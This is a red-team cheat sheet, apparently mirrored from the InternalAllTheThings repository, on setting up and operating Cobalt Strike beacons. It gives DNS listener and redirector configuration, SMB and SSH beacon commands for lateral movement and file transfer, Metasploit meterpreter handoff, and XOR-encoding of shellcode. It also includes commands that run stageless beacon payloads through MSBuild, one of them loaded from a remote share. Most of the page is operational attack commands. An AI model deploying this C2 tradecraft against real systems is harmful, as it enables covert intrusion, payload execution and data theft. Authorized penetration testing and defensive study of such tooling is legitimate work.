cobalt-strike-beacons.md (4703B)
1 --- 2 title: "Cobalt Strike - Beacons" 3 section: "Command & Control" 4 sectionSlug: "command-control" 5 sourcePath: "docs/command-control/cobalt-strike-beacons.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/command-control/cobalt-strike-beacons.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Cobalt Strike - Beacons 12 13 ## DNS Beacon 14 15 ### DNS Configuration 16 17 * Edit the `Zone File` for the domain 18 * Create an `A record` for Cobalt Strike system 19 * Create an `NS record` that points to FQDN of your Cobalt Strike system 20 21 Your Cobalt Strike team server system must be authoritative for the domains you specify. Create a `DNS A` record and point it to your Cobalt Strike team server. Use `DNS NS` records to delegate several domains or sub-domains to your Cobalt Strike team server's `A` record. 22 23 Example of DNS on Digital Ocean: 24 25 ```powershell 26 NS example.com directs to 10.10.10.10. 86400 27 NS polling.campaigns.example.com directs to campaigns.example.com. 3600 28 A campaigns.example.com directs to 10.10.10.10 3600 29 ``` 30 31 After creating a DNS listener (`Beacon DNS`), verify that your domains resolve to `0.0.0.0` 32 33 * `nslookup jibberish.beacon polling.campaigns.domain.com` 34 * `nslookup jibberish.beacon campaigns.domain.com` 35 36 If you have trouble with DNS, you can restart the `systemd` service and force Google DNS nameservers. 37 38 ```powershell 39 systemctl disable systemd-resolved 40 systemctl stop systemd-resolved 41 rm /etc/resolv.conf 42 echo "nameserver 8.8.8.8" > /etc/resolv.conf 43 echo "nameserver 8.8.4.4" >> /etc/resolv.conf 44 ``` 45 46 ### DNS Redirector 47 48 ```ps1 49 socat -T 1 udp4-listen:53,fork udp4:teamserver.example.net:53 50 ``` 51 52 Debug the DNS queries with `tcpdump -l -n -s 5655 -i eth0 udp port 53`. 53 54 ### DNS Mode 55 56 | Mode | Description | 57 | -------------- | ------------------------------------- | 58 | `mode dns-txt` | DNS TXT record data channel (default) | 59 | `mode dns` | DNS A record data channel | 60 | `mode dns6` | DNS AAAA record channel | 61 62 ## SMB Beacon 63 64 ```powershell 65 link [host] [pipename] 66 connect [host] [port] 67 unlink [host] [PID] 68 jump [exec] [host] [pipe] 69 ``` 70 71 SMB Beacon uses Named Pipes. You might encounter these error code while running it. 72 73 | Error Code | Meaning | Description | 74 | ---------- | ---------------- | ------------------------------------------------------------------------------------------- | 75 | 2 | File Not Found | There is no beacon for you to link to | 76 | 5 | Access is denied | Invalid credentials or you don't have permission | 77 | 53 | Bad Netpath | You have no trust relationship with the target system. It may or may not be a beacon there. | 78 79 ## SSH Beacon 80 81 ```powershell 82 # deploy a beacon 83 beacon> help ssh 84 Use: ssh [target:port] [user] [pass] 85 Spawn an SSH client and attempt to login to the specified target 86 87 beacon> help ssh-key 88 Use: ssh [target:port] [user] [/path/to/key.pem] 89 Spawn an SSH client and attempt to login to the specified target 90 91 # beacon's commands 92 upload Upload a file 93 download Download a file 94 socks Start SOCKS4a server to relay traffic 95 sudo Run a command via sudo 96 rportfwd Setup a reverse port forward 97 shell Execute a command via the shell 98 ``` 99 100 ## Metasploit compatibility 101 102 * Payload: `windows/meterpreter/reverse_http or windows/meterpreter/reverse_https` 103 * Set `LHOST` and `LPORT` to the beacon 104 * Set `DisablePayloadHandler` to `True` 105 * Set `PrependMigrate` to `True` 106 * `exploit -j` 107 108 ## Custom Payloads 109 110 ```powershell 111 * Attacks > Packages > Payload Generator 112 * Attacks > Packages > Scripted Web Delivery (S) 113 $ python2 ./shellcode_encoder.py -cpp -cs -py payload.bin MySecretPassword xor 114 $ C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Temp\dns_raw_stageless_x64.xml 115 $ %windir%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe \\10.10.10.10\Shared\dns_raw_stageless_x86.xml 116 ``` 117 118 ## References 119 120 * [Cobalt Strike > User Guide > DNS Beacon](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/listener-infrastructue_beacon-dns.htm) 121 * [Simple DNS Redirectors for Cobalt Strike - Thursday 11 March, 2021](https://www.cobaltstrike.com/blog/simple-dns-redirectors-for-cobalt-strike) 122 * [CobaltStrike DNS Beacon Lab Setup - rioasmara - March 18, 2023](https://rioasmara.com/2023/03/18/cobaltstrike-dns-beacon-lab-setup/)